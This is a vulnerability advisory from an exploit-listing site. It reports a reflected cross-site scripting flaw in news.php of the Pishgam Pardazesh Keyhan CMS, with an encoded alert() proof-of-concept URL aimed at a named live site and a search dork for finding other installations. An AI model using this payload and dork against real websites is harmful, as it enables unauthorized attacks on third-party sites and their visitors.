Pishgam Pardazesh Keyhan cms Cross Site Scripting Vulnerability

2018.07.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title ; Pishgam Pardazesh Keyhan cms Cross Site Scripting Vulnerability [+] Date : 2018-07-21 [+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS [+] Vendor Homepage : http://www.pipak.ir/ [+] Dork : intext:"طراح و پشتیبان : پیشگام پردازش کیهان" [+] My Site : http://4rtxtnk7o5yt3mfw.onion/ [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : https://telegram.me/WebServer [+] Description : [!] Pishgam Pardazesh Keyhan is cms. [+] Poc : [!] http://www.pishfarfars.ir/news.php?id=4%22%3E%3C/SCRIPT%3E%E2%80%9D%3E%E2%80%99%3E%3CSCRIPT%3Ealert(String.fromCharCode(72,97,99,107,101,100,32,98,89,32,58,32,73,114,97,110,105,97,110,32,69,116,104,105,99,97,108,32,72,97,99,107,101,114,115,124,124,87,101,32,65,114,101,32,58,32,48,80,51,78,51,82,32,45,32,77,101,104,114,100,97,100,95,73,99,101,32,45,32,83,48,33,104,112,32,45,32,66,97,120,84,117,114,107,50,52%20))%3C/SCRIPT%3E [+] Type of vulnerability : [!] Xss -> Reflected [+] Security Level : [!] medium [+] Exploitation Technique: [!] Remote [+] Request Method : [!] GET [+] Vulnerability Files : [!] news.php [+] Fix : [!] Restrict user input or replace bad characters [+] We Are : [+] 0P3N3R [+] Ebrahim_Vaker


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top